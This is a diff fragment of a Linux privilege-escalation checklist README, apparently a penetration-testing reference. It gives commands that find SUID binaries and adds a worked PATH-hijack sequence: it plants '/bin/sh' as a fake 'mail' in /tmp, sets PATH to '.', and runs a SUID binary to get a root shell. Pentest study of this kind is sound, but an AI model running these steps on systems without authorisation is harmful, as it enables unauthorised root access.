frizb/Linux-Privilege-Escalation/README.md

 `find / -perm -u=s -type f 2>/dev/null`
 `find / -user root -perm -4000 -exec ls -ldb {} \;`

+Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
+`strings /usr/local/bin/binaryelf`
+`echo "/bin/sh" > /tmp/mail`
+`cd /tmp`
+`export PATH=.`
+`/usr/local/bin/binaryelf`

-What files can I execute?
+What files can I execute that have SUID bits?

 Can I write files into a folder containing a SUID bit file?
 Might be possible to take advantage of a '.' in the PATH or an The IFS (or Internal Field Separator) Exploit.